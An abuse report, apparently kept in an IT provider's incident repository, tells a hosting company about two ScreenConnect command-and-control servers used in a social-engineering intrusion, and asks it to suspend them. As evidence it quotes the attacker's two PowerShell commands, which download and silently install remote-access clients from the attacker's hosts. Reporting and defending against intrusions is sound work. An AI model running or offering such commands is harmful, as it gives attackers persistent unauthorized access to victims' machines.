d7d9f72fc6
- DF-JOEL2 compromised via ScreenConnect social engineering (Angel Raya) - C2 IPs blocked, rogue clients removed, M365 sessions revoked, password reset - IC3 complaint filed, abuse reports sent to Virtuo and ConnectWise - Conditional Access policies deployed (MFA, block foreign, block legacy auth) - 38 stale test station accounts deleted from Entra - Test datasheet pipeline investigated - data exists in DB, export step broken - TestDataSheetUploader source code extracted for analysis Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
3.5 KiB
Subject: Abuse Report - Unauthorized Remote Access C2 Servers on 80.76.49.18 and 45.88.91.99
To: abuses@virtuo.host CC: noc@virtuo.host
Dear Virtuo Abuse Department,
We are reporting two IP addresses on your network that are being used as command-and-control servers for unauthorized remote access attacks against our client's infrastructure.
Offending IPs
- 80.76.49.18 (port 8041)
- 45.88.91.99 (port 8041)
Both IPs are on AS399486 (12651980 CANADA INC. / Virtuo).
Nature of Abuse
These servers are hosting self-hosted ConnectWise ScreenConnect (remote access) instances on port 8040/8041, used to maintain persistent unauthorized access to victim machines. This is not a legitimate use of remote support software -- the clients are deployed silently via PowerShell commands executed during an active social engineering attack, then hidden from the Windows uninstall list using third-party tools.
Evidence
Attack Timeline (March 27, 2026 - UTC-7)
-
At approximately 08:28, an attacker using the alias "Angel Raya" connected to the victim machine via a ScreenConnect cloud relay (instance-wlb9ga-relay.screenconnect.com).
-
At 08:29, the following commands were executed in a PowerShell session on the victim machine to download and silently install ScreenConnect clients from your infrastructure:
powershell -Command "Invoke-WebRequest -Uri 'http://80.76.49.18:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
powershell -Command "Invoke-WebRequest -Uri 'http://45.88.91.99:8040/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest' -OutFile 'ScreenConnect.ClientSetup.msi'; Start-Process msiexec -ArgumentList '/i', 'ScreenConnect.ClientSetup.msi', '/qn', '/norestart' -Wait"
-
The attacker then downloaded a tool from sordum.org ("Hide From Uninstall List") to conceal the rogue ScreenConnect installations from Windows Add/Remove Programs.
-
At 11:55, a session identified as "Administrator" connected back through the 80.76.49.18 C2 server, confirming the backdoor was actively used for return access.
ScreenConnect Service Details
Client connecting to 80.76.49.18:
- Service Name: ScreenConnect Client (0dfe1abae029411c)
- Session GUID: eec1c861-ec30-4c7a-a8e7-cc8a1dbd5a56
- Relay: 80.76.49.18:8041
- Version: 25.2.4.9229
Client connecting to 45.88.91.99:
- Service Name: ScreenConnect Client (a897d9a21259d116)
- Session GUID: 406bd356-cde4-4738-a22f-f776c8097686
- Relay: 45.88.91.99:8041
- Version: 25.2.4.9229
Additional Context
- The ScreenConnect MSI packages have file timestamps from April 8, 2025, indicating this infrastructure has been used for attacks for approximately one year.
- The victim's Microsoft 365 account was also subject to brute-force login attempts from IPs in Germany (45.86.202.x), Luxembourg, and Turkey during the same period, with a successful unauthorized sign-in from Istanbul, Turkey (91.93.232.236) on the same day.
Requested Action
We request that you:
- Immediately suspend the servers at 80.76.49.18 and 45.88.91.99
- Preserve all logs related to these IPs for law enforcement
- Provide any subscriber/billing information to law enforcement upon request
This incident is being reported to the FBI Internet Crime Complaint Center (IC3) and ConnectWise.
Reporting Organization
Arizona Computer Guru, LLC Managed Service Provider Phone: 520-304-8300 Email: support@azcomputerguru.com
Thank you for your prompt attention to this matter.